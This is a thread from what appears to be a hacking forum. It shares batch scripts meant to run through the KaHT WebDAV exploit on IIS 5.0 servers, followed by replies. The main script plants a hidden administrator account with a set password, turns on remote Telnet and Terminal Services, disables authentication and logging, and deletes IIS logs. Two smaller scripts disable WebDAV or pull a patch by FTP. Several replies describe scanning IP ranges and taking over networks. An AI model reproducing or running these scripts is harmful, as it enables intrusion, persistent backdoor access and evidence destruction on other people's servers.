I wrote few exemples scripts named " requests.txt " you can use with Khat.exe ( automated Hack and Discovery tool for WebDav IIS 5.0 Exploit ! )

I tested this against Vmware 4.0 server with W2K FR SP3 ( Work Fine ! )


[1] - EVIL SCRIPT

Descritpion of the Evil Script :

01 - Create user TsInternetUser
02 - Set password JuSt4TeSt to this user
03 - Add the user to administartor group ( UK/US/FR/DE )
04 - Disable NTLM authentification For Authorized anyone to connect
05 - Disable Telnet Log event Connection
06 - Put Netstart Services to Start in automatique mode
07 - Enabled Terminal service to start
08 - Disable WebDAV functionality
09 - Write all the Reg to Registry
10 - Write file for install TS Components
11 - Lunch quiet install with Sysocmgr.exe
12 - Stop w3svc Services
13 - Delete IIS logfiles
14 - Del Temp files create by the script
14 - Reboot the server for enable the modifications
14 - Exit command for Attack another target

CODE

net user TsInternetUser /add net user TsInternetUser JuSt4TeSt net localgroup Administrators TsInternetUser /add net localgroup Administrateurs TsInternetUser /add net localgroup Administratoren TsInternetUser /add ECHO Windows Registry Editor Version 5.00>>c:\TEST.REG ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer.0]>>c:\TEST.REG ECHO "NTLM"=dword:00000000>>c:\TEST.REG ECHO "EventLoggingEnabled"=dword:00000000>>c:\TEST.REG ECHO "LogNonAdminAttempts"=dword:00000000>>c:\TEST.REG ECHO "LogAdminAttempts"=dword:00000000>>c:\TEST.REG ECHO "LogFailures"=dword:00000000>>c:\TEST.REG ECHO "LogToFile"=dword:00000000>>c:\TEST.REG ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr]>>c:\TEST.REG ECHO "Start"=dword:00000002>>c:\TEST.REG ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>>c:\TEST.REG ECHO "Start"=dword:00000002>>c:\TEST.REG ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]>>c:\TEST.REG ECHO "EnableAdminTSRemote"=dword:00000001>>c:\TEST.REG ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>c:\TEST.REG ECHO "TSEnabled"=dword:00000001>>c:\TEST.REG ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>c:\TEST.REG ECHO "Start"=dword:00000002>>c:\TEST.REG ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters]>>c:\TEST.REG ECHO "DisableWebDAV"=dword:00000001>>c:\TEST.REG REGEDIT /S C:\TEST.REG ECHO [Components] > c:\bootlog~.txt ECHO TSEnabled = on >> c:\bootlog~.txt sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q net stop w3svc DEL %WINDIR%\system32\logfiles\*.*/S /F /Q DEL /Q c:\TEST.REG DEL /Q c:\bootlog~.txt IISRESET /REBOOT /timeout:00 EXIT

[2] - MEDIC SCRIPT

This Script Disable only the WebDav functionality . How to disable Webdav

CODE

ECHO "Start"=dword:00000002>>c:\TEST.REG ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters]>>c:\TEST.REG ECHO "DisableWebDAV"=dword:00000001>>c:\TEST.REG IISRESET /REBOOT /timeout:00 EXIT

[3] - MEDIC SCRIPT ² ( if you are sure the outgoing FTP port is authorized )

You can patch the vulnerabilitie with this Tool, before you must download the patch to microsoft ( HERE ) and put the .exe to FTP serveur.

CODE

ECHO OPEN www.exemple.com 21>c:\FTP.TXT ECHO MyLogin>>c:\FTP.TXT ECHO MyPassword>>c:\FTP.TXT ECHO GET Q815021_W2K_sp4_x86_EN.EXE C:\Q815021_W2K_sp4_x86_EN.EXE>>c:\FTP.TXT ECHO DISCONNECT>>c:\FTP.TXT ECHO QUIT>>c:\FTP.TXT FTP -S:C:\FTP.TXT C:\Q815021_W2K_sp4_x86_EN.EXE /N /Q /Z DEL /Q C:\FTP.TXT DEL /Q C:\Q815021_W2K_sp4_x86_EN.EXE IISRESET /REBOOT /timeout:00 EXIT

Nikscap thanks for this script mate ...can you put any more lke this in the exploit section....

many thanks

p.s nice script , wicked

Great script Nikscap, doing a nice job here keep up the great coding.

Hmm. Call me a n00b if ya like, but how does this script run? Remote?

Where i can download the Khat.exe?

It's actually kaht.exe small typo

Read all about it. http://www.lurhq.com/webdav.html

Just adde KaHT.exe to the downloads section.
http://www.governmentsecurity.org/forum/in...t=ST&f=19&t=453

Has Anybody been able to successfully get on a box with this exploit because my progs keep saying every single thing is patched
any replies would help

Mate Great Script just one question after Disableing the WebDav ...
what version of IIS is it and do i hack with the same programs as b4?

The lates WebDav vulnerability ( third version ,as far as i know ) has fixed
completely with SP4 . it makes a bit hard to find victims.
hey don`t worry ! there are soooooooooo many lazy admins there !!!

And who knows ? it`s MICROSOFT !!! always offerin u new things...
some times bad things , some times good things and some times fantastic
things

Very old and the script was postet more then a half year ago on coromputer...

Try to find new stuff not so old lame junk !!

C'ya
Steven..

Very nice script, thnx About kaht.exe xploit, I've been trying it the last 2 days and it works, but only got shell on about 2% of targets (actually, with wb.exe I got no shells, so I think it's better ).

maybe it's me but it doesn't work
i scanned this range 200.129.8.1 - 218.8.9.254

but nothing to find i think this exploit is death..

great job, Nikscap. gotta love your script and coding skills

This exploit is death! It's to old.

though this hole is old but i can use it on any shell i have get .
so it is perfect thx

i still get results when i use it internaly once ive got a shell i wait until 2 in the morning and run it on ther desktop, ive seen myself takin over a whole network with it. im not sure y it works internaly better than remotely i think it may b beacause there router block port 135 externally

i have try to get command on webdav.
there r alot of tools i downloaded it.but no one of it work.
Is there a good one of tool ,wicht i can use to get command?
Pl. help!

Thanks the post!

I can seem to be able to get these things to work. Maybe i am doing something wrong.

Thanks again

I would like to see more sploits built like this.

very nice script
uuuuuuuuuseeeeeeeeful

good job man
I ll try your commands

mayeb i can use then for Other things
So GoOoD So GooOooD

plex

sory for my french english :-p

something werd happen, i have this error, host connect to me listenning NC, but then no data is sent and it time out. how to fix this

thx for the nice script

thanks for the great script, now to put it to use

how to i use it

i ad kinda new in this shit

if you guys cant find vulnerable boxs your not checking you logs :]

This is very nicely made, however would have been nice to see this 6 months back when I was working with WebDav everyday; seems to be a dead sploit now, SP4 fixed most vulnerabilities...

Find kaht here : http://www.securityfocus.com/data/vulnerab...loits/kaht2.zip

grat job was just working on such a thing, lol working ... (1/2 hour)

thx